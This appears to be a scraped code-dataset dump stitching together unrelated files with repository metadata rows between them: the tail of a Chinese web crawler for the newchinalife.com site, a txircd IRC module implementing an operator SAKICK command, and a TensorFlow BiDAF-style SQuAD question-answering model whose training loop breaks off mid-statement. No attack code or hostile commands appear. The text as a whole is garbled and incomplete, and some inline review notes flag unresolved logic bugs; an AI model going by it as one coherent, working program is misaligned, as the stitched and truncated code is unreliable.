    except (error.URLError, error.HTTPError) as e:
        # Fixes: ``except A or B`` only ever caught A, and the recursive
        # retry's result was discarded instead of returned.
        # NOTE(review): requests raises requests.exceptions.RequestException,
        # not urllib's error classes -- confirm which exceptions are expected.
        if num_retries > 0 and hasattr(e, 'code') and 500 <= e.code < 600:
            return url_get(num_retries - 1)
        print("url无法连接")
# 此函数用于提取各链接网站下的所有链接
def spiderpage(url):
    """Fetch ``url`` and return every href found on the page."""
    try:
        kv = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) Chrome/57.0.2987.98 Safari/537.36 LBBROWSER'}
        r = requests.get(url, headers=kv)
        r.encoding = r.apparent_encoding
        pagetext = r.text
        # Capture the contents of href="..." or href='...' attributes.
        pagelinks = re.findall(r'(?<=<a href=\").*?(?=\")|(?<=href=\').*?(?=\')', pagetext)
        return pagelinks
    except Exception:
        # Narrowed from a bare ``except:`` (which also swallowed
        # KeyboardInterrupt/SystemExit); return a harmless placeholder.
        pagelinks = ['http://']
        print("这个网站有点东西")
        return pagelinks
# 此函数用来检测链接是否为外网链接或者不合格链接
def getTitle(url):
    """Fetch ``url`` and return its <title> text.

    Returns the sentinel strings "这网站没有灵性" (no usable title) or
    "不可加载" (no body / fetch failure) that the crawl loop keys on.
    """
    headers = {'Accept': '*/*',
               'Accept-Language': 'en-US,en;q=0.8',
               'Cache-Control': 'max-age=0',
               'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36',
               'Connection': 'keep-alive',
               'Referer': 'http://www.baidu.com/'
               }
    print(url)
    req = request.Request(url, headers=headers)
    try:
        # Context manager closes the response even on parse/decode errors
        # (the original leaked the connection).
        with request.urlopen(req) as response:
            html = response.read().decode('utf-8')
        soup = BeautifulSoup(html, "html.parser")
        if soup.body is not None:
            title = soup.head.title.string
            print(title)
            if title is not None:
                return title
            return "这网站没有灵性"
        return "不可加载"
    except Exception:
        # Narrowed from a bare ``except:``; any fetch/decode/parse failure
        # (including a missing <head>) marks the page as unloadable.
        print("这网站没有灵性")
        return "不可加载"
# 正则删选函数
def url_filtrate(pagelinks):
    """Filter crawled hrefs down to unique, same-site absolute urls.

    Rules (matching the original intent):
      * drop junk: javascript/jse/ALL/login prefixes, pdf/css suffixes,
        and anything containing '@' (mail links);
      * keep absolute http(s) urls only when they contain 'newchinalife';
      * treat everything else as a site-relative path and prefix the domain.

    Fixes two defects in the original: it removed items from ``pagelinks``
    while iterating it (skipping neighbors), and it tested
    ``re.findall(...) is None`` (findall returns a list, never None), so the
    external-domain filter never actually fired.
    """
    same_target_url = []
    for raw in pagelinks:
        murl = re.sub(r'\s+', '', raw)
        if (re.findall("^java", murl) or re.findall("^jse", murl)
                or re.findall("^ALL", murl) or re.findall("pdf$", murl)
                or re.findall("^login", murl) or re.findall("css$", murl)
                or re.findall("@", murl)):
            continue
        if re.findall("^http", murl):
            # Absolute links: keep only those on the target site.
            if re.findall("newchinalife", murl):
                same_target_url.append(str(murl))
            continue
        # Relative links (the original's [0-9]*$ branch matched everything).
        same_target_url.append("https://www.newchinalife.com" + str(murl))
    # Deduplicate while preserving first-seen order.
    unrepect_url = []
    for l in same_target_url:
        if l not in unrepect_url:
            unrepect_url.append(l)
    print(unrepect_url)
    return unrepect_url
class linkQuence:
    """Bookkeeping for the crawler: visited and pending url queues."""

    def __init__(self):
        # urls already crawled
        self.visited = []
        # urls waiting to be crawled
        self.unvisited = []

    def getvisitedurl(self):
        """Return the list of visited urls."""
        return self.visited

    def getunvisitedurl(self):
        """Return the list of pending urls."""
        return self.unvisited

    def addvisitedurl(self, url):
        """Record ``url`` as visited."""
        return self.visited.append(url)

    def removevisitedurl(self, url):
        """Forget a previously visited ``url``."""
        return self.visited.remove(url)

    def unvisitedurldequence(self):
        """Pop one pending url, or None when the queue is empty."""
        try:
            return self.unvisited.pop()
        except IndexError:
            return None

    def addunvisitedurl(self, url):
        """Queue ``url`` unless it is empty or already known."""
        is_new = url != "" and url not in self.visited and url not in self.unvisited
        if is_new:
            return self.unvisited.insert(0, url)

    def getvisitedurlount(self):
        """Number of visited urls (original method name kept as-is)."""
        return len(self.visited)

    def getunvistedurlcount(self):
        """Number of pending urls (original method name kept as-is)."""
        return len(self.unvisited)

    def unvisitedurlsempty(self):
        """True when nothing is left to crawl."""
        return len(self.unvisited) == 0
class Spider():
    """Crawler driving the url queues.

    Seeds the queue with the entry url, then repeatedly pops unvisited urls,
    keeps only pages whose title contains "新华保险" (i.e. stays on-site),
    and enqueues their filtered child links.
    """
    def __init__(self, url):
        self.linkQuence = linkQuence()  # shared visited/unvisited queues
        self.linkQuence.addunvisitedurl(url)  # crawl entry point
    # The actual crawl loop.
    def crawler(self, urlcount):
        # ``urlcount`` caps how many pages get crawled (handy for testing).
        x = 1
        # NOTE(review): ``or x == urlcount`` only matters on the single
        # iteration where x equals urlcount -- confirm the intended stop
        # condition.
        while self.linkQuence.unvisited or x == urlcount:
            # Alternative condition when the site is small:
            # while not self.linkQuence.unvisitedurlsempty():
            if x > 1:
                print(f"第{x-1}个url,开始爬")
            visitedurl = self.linkQuence.unvisitedurldequence()  # pop one pending url
            if visitedurl is None or visitedurl == '':
                continue
            title = getTitle(visitedurl)
            if re.findall("新华保险", title):  # skip pages that left the site
                initial_links = spiderpage(visitedurl)  # every link on the page
                right_links = url_filtrate(initial_links)  # keep only qualified links
                if not right_links:
                    pass
                else:
                    self.linkQuence.addvisitedurl(visitedurl)  # mark as visited
                    for link in right_links:  # queue the filtered children
                        self.linkQuence.addunvisitedurl(link)
                    x += 1
            else:
                pass
        print(f"爬完了")
        return self.linkQuence.visited
# 写文件函数
def writetofile(urllist):
    """Append every url in ``urllist`` to Furls.txt, one per line.

    Fixes two defects: the original re-opened Furls.txt inside the loop and
    only closed the last handle (leaking the rest), and it raised NameError
    on an empty ``urllist`` because ``file`` was never bound before close().
    """
    # Open once; the ``with`` block guarantees the handle is closed.
    with open('Furls.txt', 'a', encoding='utf8') as file:
        for url in urllist:
            file.write(f'{url}\n')
    print(f'写入已完成,总计{len(urllist)}个网页的子链接')
# 主循环
# Entry point: check the seed page, crawl, then dump the visited urls.
if __name__ == '__main__':
    url = url_get()
    spider = Spider(url)
    # Cap on how many child pages to crawl.
    urllist = spider.crawler(5000)
writetofile(urllist) | [
"1249697647@qq.com"
] | 1249697647@qq.com |
c772b810a9760e5ff8cbb46d46b9a06bb0bc6a44 | 626eb6d26cfbf605da6948e18ae265bbdb393908 | /txircd/modules/sakick.py | 02db8c8825db25c4aa0109423f069d7b062e3d47 | [
"BSD-3-Clause"
] | permissive | smillaedler/txircd | 3e4cf8ca4d61876b8b5672cb0d4fa4729cb0fb10 | 6a5a65edb9d9ed383a14dc7fa758071805220a04 | refs/heads/master | 2021-01-17T06:09:57.960863 | 2013-07-21T03:36:24 | 2013-07-21T03:36:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,051 | py | from twisted.words.protocols import irc
from txircd.modbase import Command
class SakickCommand(Command):
    """Oper-only forced KICK: removes a user from a channel server-side."""

    def onUse(self, user, data):
        channel = data["targetchan"]
        target = data["targetuser"]
        reason = data["reason"]
        # Announce the kick to the channel, then actually remove the user.
        channel.sendChannelMessage("KICK", target.nickname, ":{}".format(reason), prefix=user.prefix())
        target.leave(channel)

    def processParams(self, user, params):
        # Validation order matters: each failure sends its own numeric reply
        # and aborts with an empty dict.
        if user.registered > 0:
            user.sendMessage(irc.ERR_NOTYETREGISTERED, "SAKICK", ":You have not registered")
            return {}
        if "o" not in user.mode:
            user.sendMessage(irc.ERR_NOPRIVILEGES, ":Permission denied - You do not have the correct operator privileges")
            return {}
        if not params or len(params) < 2:
            user.sendMessage(irc.ERR_NEEDMOREPARAMS, "SAKICK", ":Not enough parameters")
            return {}
        channel_name, target_nick = params[0], params[1]
        if channel_name not in self.ircd.channels:
            user.sendMessage(irc.ERR_NOSUCHCHANNEL, channel_name, ":No such channel")
            return {}
        if target_nick not in self.ircd.users:
            user.sendMessage(irc.ERR_NOSUCHNICK, target_nick, ":No such nick")
            return {}
        channel = self.ircd.channels[channel_name]
        target = self.ircd.users[target_nick]
        if target not in channel.users:
            user.sendMessage(irc.ERR_USERNOTINCHANNEL, target.nickname, channel.name, ":They are not on that channel")
            return {}
        # Default reason is the kicker's own nickname.
        reason = " ".join(params[2:]) if len(params) >= 3 else user.nickname
        return {
            "user": user,
            "targetchan": channel,
            "targetuser": target,
            "reason": reason
        }
class Spawner(object):
    """Module spawner: wires the SAKICK command into the IRCd."""

    def __init__(self, ircd):
        # Keep a handle on the server so cleanup can unregister the command.
        self.ircd = ircd

    def spawn(self):
        """Return the command table contributed by this module."""
        return {"commands": {"SAKICK": SakickCommand()}}
def cleanup(self):
del self.ircd.commands["SAKICK"] | [
"ElementAlchemist7@gmail.com"
] | ElementAlchemist7@gmail.com |
8b748833500e66fb41053714a4da66557c56381b | 0347ccdb695e43c79fc4907d283cc82ceb72355e | /model.bidaf+cnn.py | 934c44906aa35d26f1abcc71a967ba81fffe3e4b | [] | no_license | daguix/cs224n-assignment4 | a8d4d277ad174453f92ed45af788766b100c718f | b71a208b98516bebb3b7f266b8154ba45111ac6c | refs/heads/master | 2020-03-13T21:38:21.309076 | 2018-05-18T15:56:50 | 2018-05-18T15:56:50 | 131,300,519 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,068 | py | import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import time
from os.path import join as pjoin
import numpy as np
import tensorflow as tf
from utils import Progbar
from evaluate import evaluate
import numbers
from evaluate import evaluate
from tensorflow.contrib.layers import xavier_initializer
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.framework import ops
from layers import residual_block, conv
# Root directory of the preprocessed SQuAD data (token-id files,
# glove.trimmed.100.npz, vocab.dat).
DATA_DIR = "./data/squad"
def load_from_file(file):
    """Read a DATA_DIR file of whitespace-separated ints into a numpy array."""
    with open(pjoin(DATA_DIR, file), "r") as handle:
        rows = [[int(token) for token in line.split()] for line in handle]
    return np.array(rows)
def create_dataset(file):
    """Build a tf.data pipeline yielding one int32 id-vector per line of ``file``."""
    lines = tf.data.TextLineDataset(pjoin(DATA_DIR, file))
    token_strings = lines.map(lambda line: tf.string_split([line]).values)
    return token_strings.map(
        lambda tokens: tf.string_to_number(tokens, out_type=tf.int32))
def with_length(dataset):
    """Pair each dataset element with its own length (tf.size)."""
    return dataset.map(lambda element: (element, tf.size(element)))
def load_word_embeddings():
    """Load the trimmed 100-d GloVe matrix as float32."""
    glove_path = pjoin(DATA_DIR, "glove.trimmed.100.npz")
    return np.load(glove_path)["glove"].astype(np.float32)
def load_vocabulary():
    """Read the vocabulary file (one token per line) into a numpy array."""
    with open(pjoin(DATA_DIR, "vocab.dat"), "r") as handle:
        return np.array([line.strip() for line in handle])
def convert_indices_to_text(vocabulary, context, start, end):
    """Map the inclusive span [start, end] of ``context`` token ids to text.

    Returns '' for inverted spans or spans running past the context.
    """
    if end < start or end >= len(context):
        return ''
    token_ids = np.take(context, np.arange(start, end + 1))
    words = np.take(vocabulary, token_ids)
    return ' '.join(words)
def preprocess_softmax(tensor, mask):
    """Replace logits at padded (mask == False) positions with -1e9."""
    off_mask = tf.subtract(tf.constant(1.0), tf.cast(mask, tf.float32))
    large_negative = tf.multiply(off_mask, tf.constant(-1e9))
    return tf.where(mask, tensor, large_negative)
def bilstm(question_embeddings, question_lengths, lstm_hidden_size, keep_prob=1.0):
    """Run a bidirectional GRU and concatenate both directions.

    Returns (per-step outputs [B, T, 2H], final states [B, 2H]).  Despite
    the function name, the cells are GRUs, not LSTMs.
    """
    fw_cell = tf.nn.rnn_cell.DropoutWrapper(
        tf.nn.rnn_cell.GRUCell(lstm_hidden_size, name="gru_cell_fw"),
        input_keep_prob=keep_prob)
    bw_cell = tf.nn.rnn_cell.DropoutWrapper(
        tf.nn.rnn_cell.GRUCell(lstm_hidden_size, name="gru_cell_bw"),
        input_keep_prob=keep_prob)
    (out_fw, out_bw), (final_fw, final_bw) = tf.nn.bidirectional_dynamic_rnn(
        fw_cell, bw_cell, question_embeddings,
        sequence_length=question_lengths, dtype=tf.float32, time_major=False)
    step_outputs = tf.concat([out_fw, out_bw], 2)
    final_states = tf.concat([final_fw, final_bw], 1)
    return (step_outputs, final_states)
def zoneout(x, keep_prob, noise_shape=None, seed=None, name=None):
    """Zoneout-style masking: dropout WITHOUT rescaling, then inverted.

    With probability ``keep_prob`` an element of ``x`` is kept, otherwise it
    is zeroed; the function then returns ``1. - masked``.  Callers pass the
    complement of a gate (e.g. ``1 - F``), so the result is the
    zoneout-perturbed gate.  ``noise_shape`` broadcasts the keep/drop
    decisions across dimensions exactly as in ``tf.nn.dropout``.

    NOTE(review): the ``keep_prob == 1`` shortcut returns ``x`` itself,
    while the general path would yield ``1. - x`` in that limit -- the
    constant case is inconsistent with the stochastic one.  Confirm the
    intended behavior before relying on keep_prob=1.

    Args:
      x: A tensor.
      keep_prob: Scalar tensor or float in (0, 1]: keep probability.
      noise_shape: Optional 1-D int32 tensor: shape of the keep/drop flags.
      seed: Optional Python integer for reproducible randomness.
      name: Optional name for the op scope.

    Returns:
      A tensor with the same shape as ``x``.

    Raises:
      ValueError: If ``keep_prob`` is not in (0, 1].
    """
    with tf.name_scope(name or "dropout") as name:
        x = ops.convert_to_tensor(x, name="x")
        if isinstance(keep_prob, numbers.Real) and not 0 < keep_prob <= 1:
            raise ValueError("keep_prob must be a scalar tensor or a float in the "
                             "range (0, 1], got %g" % keep_prob)
        keep_prob = ops.convert_to_tensor(keep_prob,
                                          dtype=x.dtype,
                                          name="keep_prob")
        keep_prob.get_shape().assert_is_compatible_with(tensor_shape.scalar())
        # Do nothing if we know keep_prob == 1 (see NOTE above).
        if tensor_util.constant_value(keep_prob) == 1:
            return x
        noise_shape = noise_shape if noise_shape is not None else array_ops.shape(
            x)
        # uniform [keep_prob, 1.0 + keep_prob)
        random_tensor = keep_prob
        random_tensor += random_ops.random_uniform(noise_shape,
                                                   seed=seed,
                                                   dtype=x.dtype)
        # 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
        binary_tensor = math_ops.floor(random_tensor)
        ret = x * binary_tensor
        ret.set_shape(x.get_shape())
        return 1. - ret
class QRNN_fo_pooling(tf.nn.rnn_cell.RNNCell):
    """QRNN 'fo' pooling cell.

    The convolutional front-end packs [Z | F | O] along the feature axis;
    each step computes c_t = f * c_{t-1} + (1 - f) * z and h_t = o * c_t.
    """

    def __init__(self, out_fmaps):
        # Feature maps per gate (== both state and output size).
        self.__num_units = out_fmaps

    @property
    def state_size(self):
        return self.__num_units

    @property
    def output_size(self):
        return self.__num_units

    def __call__(self, inputs, state, scope=None):
        """inputs: 2-D tensor [batch_size, 3 * out_fmaps], packed as Z|F|O."""
        print('QRNN pooling inputs shape: ', inputs.get_shape())
        print('QRNN pooling state shape: ', state.get_shape())
        with tf.variable_scope(scope or "QRNN-fo-pooling"):
            # Unpack candidate, forget gate and output gate activations.
            Z, F, O = tf.split(inputs, 3, 1)
            print('QRNN pooling Z shape: ', Z.get_shape())
            print('QRNN pooling F shape: ', F.get_shape())
            print('QRNN pooling O shape: ', O.get_shape())
            # f-gated running state, then the output gate.
            new_state = tf.multiply(F, state) + tf.multiply(tf.subtract(1., F), Z)
            output = tf.multiply(O, new_state)
            return output, new_state
class QRNN_f_pooling(tf.nn.rnn_cell.RNNCell):
    """QRNN 'f' pooling cell (state is the output).

    The convolutional front-end packs [Z | F] along the feature axis; each
    step computes h_t = f * h_{t-1} + (1 - f) * z.
    """

    def __init__(self, out_fmaps):
        # Feature maps per gate (== both state and output size).
        self.__num_units = out_fmaps

    @property
    def state_size(self):
        return self.__num_units

    @property
    def output_size(self):
        return self.__num_units

    def __call__(self, inputs, state, scope=None):
        """inputs: 2-D tensor [batch_size, 2 * out_fmaps], packed as Z|F."""
        print('QRNN pooling inputs shape: ', inputs.get_shape())
        print('QRNN pooling state shape: ', state.get_shape())
        with tf.variable_scope(scope or "QRNN-f-pooling"):
            # Unpack candidate and forget-gate activations.
            Z, F = tf.split(inputs, 2, 1)
            print('QRNN pooling Z shape: ', Z.get_shape())
            print('QRNN pooling F shape: ', F.get_shape())
            # Dynamic average pooling; output and state are the same tensor.
            output = tf.multiply(F, state) + tf.multiply(tf.subtract(1., F), Z)
            return output, output
def qrnn_f(question_embeddings, question_lengths, hidden_size, keep_prob=1.0):
    """Quasi-recurrent layer with f-pooling.

    A width-2 causal convolution produces the candidate Z (tanh) and the
    forget gate F (sigmoid, perturbed by zoneout); ``QRNN_f_pooling`` then
    runs the cheap recurrence h_t = f*h_{t-1} + (1-f)*z.  Returns
    (per-step outputs, final state) like ``tf.nn.dynamic_rnn``.
    """
    filter_width = 2
    in_fmaps = question_embeddings.get_shape().as_list()[-1]
    out_fmaps = hidden_size
    # Left-pad by filter_width-1 so the convolution is causal (no lookahead).
    padded_input = tf.pad(question_embeddings, [
                          [0, 0], [filter_width - 1, 0], [0, 0]])
    with tf.variable_scope('convolutions'):
        Wz = tf.get_variable('Wz', [filter_width, in_fmaps, out_fmaps],
                             initializer=tf.random_uniform_initializer(minval=-.05, maxval=.05))
        z_a = tf.nn.conv1d(padded_input, Wz, stride=1, padding='VALID')
        Z = tf.nn.tanh(z_a)
        Wf = tf.get_variable('Wf',
                             [filter_width, in_fmaps, out_fmaps],
                             initializer=tf.random_uniform_initializer(minval=-.05, maxval=.05))
        f_a = tf.nn.conv1d(padded_input, Wf, stride=1, padding='VALID')
        F = tf.sigmoid(f_a)
        # Zoneout on the forget gate (applied to its complement).
        F = zoneout((1. - F), keep_prob)
        # Pack [Z | F] along features for the pooling cell to unpack.
        T = tf.concat([Z, F], 2)
    with tf.variable_scope('pooling'):
        pooling_fw = QRNN_f_pooling(out_fmaps)
        question_output, question_output_final = tf.nn.dynamic_rnn(
            pooling_fw, T, sequence_length=question_lengths, dtype=tf.float32)
        print('question_output', question_output.get_shape().as_list())
        print('question_output_final', question_output_final.get_shape().as_list())
    return (question_output, question_output_final)
def bi_qrnn_fo(question_embeddings, question_lengths, hidden_size, keep_prob=1.0):
    """Bidirectional quasi-recurrent layer with fo-pooling.

    A width-2 causal convolution produces Z (tanh), forget gate F (sigmoid +
    zoneout) and output gate O (sigmoid); two ``QRNN_fo_pooling`` cells run
    the recurrence in both directions.  Returns (per-step outputs [B,T,2H],
    final states [B,2H]).  NOTE(review): both directions consume the same
    left-padded (causal) convolution features -- the backward pass therefore
    sees the forward-causal features in reverse; confirm that is intended.
    """
    filter_width = 2
    in_fmaps = question_embeddings.get_shape().as_list()[-1]
    out_fmaps = hidden_size
    # Left-pad by filter_width-1 so the convolution is causal (no lookahead).
    padded_input = tf.pad(question_embeddings, [
                          [0, 0], [filter_width - 1, 0], [0, 0]])
    with tf.variable_scope('convolutions'):
        Wz = tf.get_variable('Wz', [filter_width, in_fmaps, out_fmaps],
                             initializer=tf.random_uniform_initializer(minval=-.05, maxval=.05))
        z_a = tf.nn.conv1d(padded_input, Wz, stride=1, padding='VALID')
        Z = tf.nn.tanh(z_a)
        Wf = tf.get_variable('Wf',
                             [filter_width, in_fmaps, out_fmaps],
                             initializer=tf.random_uniform_initializer(minval=-.05, maxval=.05))
        f_a = tf.nn.conv1d(padded_input, Wf, stride=1, padding='VALID')
        F = tf.sigmoid(f_a)
        # Zoneout on the forget gate (applied to its complement).
        F = zoneout((1. - F), keep_prob)
        Wo = tf.get_variable('Wo',
                             [filter_width, in_fmaps, out_fmaps],
                             initializer=tf.random_uniform_initializer(minval=-.05, maxval=.05))
        f_o = tf.nn.conv1d(padded_input, Wo, stride=1, padding='VALID')
        O = tf.sigmoid(f_o)
        # Pack [Z | F | O] along features for the pooling cells to unpack.
        T = tf.concat([Z, F, O], 2)
    with tf.variable_scope('pooling'):
        pooling_fw = QRNN_fo_pooling(out_fmaps)
        pooling_bw = QRNN_fo_pooling(out_fmaps)
        (question_output_fw, question_output_bw), (question_output_final_fw, question_output_final_bw) = tf.nn.bidirectional_dynamic_rnn(
            pooling_fw, pooling_bw, T, sequence_length=question_lengths, dtype=tf.float32)
        question_output = tf.concat(
            [question_output_fw, question_output_bw], 2)
        question_output_final = tf.concat(
            [question_output_final_fw, question_output_final_bw], 1)
    return (question_output, question_output_final)
class Baseline(object):
    def __init__(self, train_dataset, val_dataset, embedding, vocabulary, batch_size=128):
        """Store datasets/embeddings and declare graph-level hyperparameters.

        ``embedding`` is the pretrained word-embedding matrix; ``vocabulary``
        maps token ids back to strings for answer reconstruction.
        """
        self.train_dataset = train_dataset
        self.val_dataset = val_dataset
        self.embedding = embedding
        self.batch_size = batch_size
        # Adam learning rate.
        self.lr = 0.005
        self.gstep = tf.Variable(0, dtype=tf.int32,
                                 trainable=False, name='global_step')
        # Width of the conv/attention blocks built in pred().
        self.lstm_hidden_size = 100
        self.vocabulary = vocabulary
        # Feedable iterator handle: selects train/val pipeline per sess.run.
        self.handle = tf.placeholder(tf.string, shape=[])
        self.keep_prob = tf.placeholder(tf.float32, shape=[])
        # Fixed padding lengths -- presumably the training-set maxima; confirm.
        self.train_max_context_length = 744
        self.train_max_question_length = 60
def encoder(self, embeddings, lengths, hidden_size, keep_prob=1.0):
return bilstm(embeddings, lengths, hidden_size, keep_prob)
    def pred(self):
        """Build the prediction graph (BiDAF attention + QANet-style encoders).

        Pipeline: embed question/context -> shared residual-conv encoders ->
        BiDAF context-to-query and query-to-context attention -> three
        stacked model encoders -> masked start/end pointer logits
        (``self.pred_start`` / ``self.pred_end``) and greedy argmax spans
        (``self.preds``).
        """
        with tf.variable_scope("embedding_layer"):
            (self.questions, question_lengths), (self.contexts,
                                                 context_lengths), self.answers = self.iterator.get_next()
            #max_context_length = tf.reduce_max(context_lengths)
            #max_question_length = tf.reduce_max(question_lengths)
            # Fixed maxima (rather than per-batch maxima) keep shapes static.
            max_context_length = self.train_max_context_length
            max_question_length = self.train_max_question_length
            context_mask = tf.sequence_mask(
                context_lengths, maxlen=max_context_length)
            question_mask = tf.sequence_mask(
                question_lengths, maxlen=max_question_length)
            question_embeddings = tf.nn.embedding_lookup(
                self.embedding, self.questions)
            context_embeddings = tf.nn.embedding_lookup(
                self.embedding, self.contexts)
            print('question_embeddings',
                  question_embeddings.get_shape().as_list())
            print('context_embeddings',
                  context_embeddings.get_shape().as_list())
        # Shared (reuse=True) residual conv encoder for both sequences.
        with tf.variable_scope("embedding_layer"):
            context_output = residual_block(context_embeddings,
                                            num_blocks=1,
                                            num_conv_layers=4,
                                            kernel_size=7,
                                            mask=context_mask,
                                            num_filters=self.lstm_hidden_size,
                                            num_heads=1,
                                            seq_len=max_context_length,
                                            scope="Encoder_Residual_Block",
                                            bias=False,
                                            dropout=1.0 - self.keep_prob)
            print('context_output',
                  context_output.get_shape().as_list())
            question_output = residual_block(question_embeddings,
                                             num_blocks=1,
                                             num_conv_layers=4,
                                             kernel_size=7,
                                             mask=question_mask,
                                             num_filters=self.lstm_hidden_size,
                                             num_heads=1,
                                             seq_len=max_question_length,
                                             scope="Encoder_Residual_Block",
                                             reuse=True,  # Share the weights between passage and question
                                             bias=False,
                                             dropout=1.0 - self.keep_prob)
            print('question_output',
                  question_output.get_shape().as_list())
        # BiDAF-style attention between context and question encodings.
        with tf.variable_scope("attention_layer"):
            # Similarity: [B, ctx_len, q_len] via dot products.
            similarity_matrix = tf.matmul(context_output, tf.transpose(
                question_output, [0, 2, 1]))
            print('similarity_matrix', similarity_matrix.get_shape().as_list())
            mask_aug = tf.expand_dims(
                context_mask, 2) & tf.expand_dims(question_mask, 1)
            similarity_matrix = preprocess_softmax(
                similarity_matrix, mask_aug)
            print('similarity_matrix', similarity_matrix.get_shape().as_list())
            # Context-to-query: softmax over question positions.
            context_to_query_attention_weights = tf.nn.softmax(
                similarity_matrix, axis=2)
            print('context_to_query_attention_weights',
                  context_to_query_attention_weights.get_shape().as_list())
            context_to_query = tf.matmul(
                context_to_query_attention_weights, question_output)
            print('context_to_query', context_to_query.get_shape().as_list())
            # Query-to-context: softmax over the per-row max similarities.
            max_col_similarity = tf.reduce_max(similarity_matrix, axis=2)
            print('max_col_similarity', max_col_similarity.get_shape().as_list())
            b = tf.nn.softmax(max_col_similarity, axis=1)
            print('b', b.get_shape().as_list())
            b = tf.expand_dims(b, 1)
            print('b', b.get_shape().as_list())
            query_to_context = tf.matmul(b, context_output)
            print('query_to_context',
                  query_to_context.get_shape().as_list())
            context_output_with_context_to_query = context_output * context_to_query
            print('context_output_with_context_to_query',
                  context_output_with_context_to_query.get_shape().as_list())
            context_output_with_query_to_context = context_output * query_to_context
            print('context_output_with_query_to_context',
                  context_output_with_query_to_context.get_shape().as_list())
            # G = [H; U~; H*U~; H*H~] along features, as in BiDAF.
            attention = tf.concat([context_output, context_to_query,
                                   context_output_with_context_to_query, context_output_with_query_to_context], axis=2)
            print('attention', attention.get_shape().as_list())
        # Three stacked model encoders sharing weights (reuse for i > 0).
        with tf.variable_scope("modeling_layer"):
            self.enc = [conv(attention, self.lstm_hidden_size,
                             name="input_projection")]
            for i in range(3):
                if i % 2 == 0:  # dropout every 2 blocks
                    self.enc[i] = tf.nn.dropout(
                        self.enc[i], self.keep_prob)
                self.enc.append(
                    residual_block(self.enc[i],
                                   num_blocks=7,
                                   num_conv_layers=2,
                                   kernel_size=5,
                                   mask=context_mask,
                                   num_filters=self.lstm_hidden_size,
                                   num_heads=1,
                                   seq_len=max_context_length,
                                   scope="Model_Encoder",
                                   bias=False,
                                   reuse=True if i > 0 else None,
                                   dropout=1.0 - self.keep_prob)
                )
                print('self.enc[i]',
                      self.enc[i].get_shape().as_list())
        # Start pointer: projects [enc1; enc2], masked over padding.
        with tf.variable_scope("output_layer_start"):
            pred_start = tf.squeeze(conv(tf.concat(
                [self.enc[1], self.enc[2]], axis=-1), 1, bias=False, name="start_pointer"), -1)
            print('pred_start',
                  pred_start.get_shape().as_list())
            self.pred_start = preprocess_softmax(pred_start, context_mask)
            print('self.pred_start',
                  self.pred_start.get_shape().as_list())
        # End pointer: projects [enc1; enc3], masked over padding.
        with tf.variable_scope("output_layer_end"):
            pred_end = tf.squeeze(conv(tf.concat(
                [self.enc[1], self.enc[3]], axis=-1), 1, bias=False, name="end_pointer"), -1)
            print('pred_end',
                  pred_end.get_shape().as_list())
            self.pred_end = preprocess_softmax(pred_end, context_mask)
            print('self.pred_end',
                  self.pred_end.get_shape().as_list())
        # Greedy spans: [B, 2] of (start, end) argmax indices.
        self.preds = tf.transpose(
            [tf.argmax(self.pred_start, axis=1), tf.argmax(self.pred_end, axis=1)])
def loss(self):
with tf.variable_scope("loss"):
loss_start = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=self.pred_start, labels=self.answers[:, 0])
loss_end = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=self.pred_end, labels=self.answers[:, 1])
self.total_loss = tf.reduce_mean(
loss_start) + tf.reduce_mean(loss_end)
def optimize(self):
self.opt = tf.train.AdamOptimizer(learning_rate=self.lr).minimize(self.total_loss,
global_step=self.gstep)
def build(self):
self.get_data()
self.pred()
self.loss()
self.optimize()
    def get_data(self):
        """Build the padded-batch input pipelines and a shared feedable iterator.

        Creates three initializable iterators — full training batches, a
        500-element shuffled training-evaluation sample, and a 500-element
        shuffled validation sample — plus a string-handle iterator
        (self.iterator) so the same graph can be fed from any of them by
        switching self.handle at session-run time.
        """
        # Element structure: ((question, len(question)), (context, len(context)), answer_span).
        padded_shapes = ((tf.TensorShape([self.train_max_question_length]), # question of unknown size
                          tf.TensorShape([])), # size(question)
                         (tf.TensorShape([self.train_max_context_length]), # context of unknown size
                          tf.TensorShape([])), # size(context)
                         tf.TensorShape([2]))
        # Pad every sequence (and length slot) with zeros.
        padding_values = ((0, 0), (0, 0), 0)
        train_batch = self.train_dataset.padded_batch(
            self.batch_size, padded_shapes=padded_shapes, padding_values=padding_values)
        # train_evaluation = self.train_dataset.
        train_eval_batch = self.train_dataset.shuffle(10000).padded_batch(
            500, padded_shapes=padded_shapes, padding_values=padding_values)
        val_batch = self.val_dataset.shuffle(10000).padded_batch(
            500, padded_shapes=padded_shapes, padding_values=padding_values).prefetch(1)
        # Create a one shot iterator over the zipped dataset
        self.train_iterator = train_batch.make_initializable_iterator()
        self.val_iterator = val_batch.make_initializable_iterator()
        self.train_eval_iterator = train_eval_batch.make_initializable_iterator()
        # self.iterator = train_batch.make_initializable_iterator()
        # Feedable iterator: which dataset it reads from is chosen per run
        # via the string handle placeholder self.handle.
        self.iterator = tf.data.Iterator.from_string_handle(
            self.handle, self.train_iterator.output_types, self.train_iterator.output_shapes)
def train(self, n_iters):
eval_step = 10
with tf.Session() as sess:
self.train_iterator_handle = sess.run(
self.train_iterator.string_handle())
self.val_iterator_handle = sess.run(
self.val_iterator.string_handle())
self.train_eval_iterator_handle = sess.run(
self.train_eval_iterator.string_handle())
sess.run(tf.global_variables_initializer())
# writer = tf.summary.FileWriter(
# 'graphs/attention1', sess.graph)
initial_step = self.gstep.eval()
sess.run(self.val_iterator.initializer)
sess.run(self.train_eval_iterator.initializer)
variables = tf.trainable_variables()
num_vars = np.sum([np.prod(v.get_shape().as_list())
for v in variables])
print("Number of variables in models: {}".format(num_vars))
for epoch in range(n_iters):
print("epoch #", epoch)
num_batches = int(67978.0 / self.batch_size)
progress = Progbar(target=num_batches)
sess.run(self.train_iterator.initializer)
index = 0
total_loss = 0
progress.update(index, [("training loss", total_loss)])
while True:
index += 1
try:
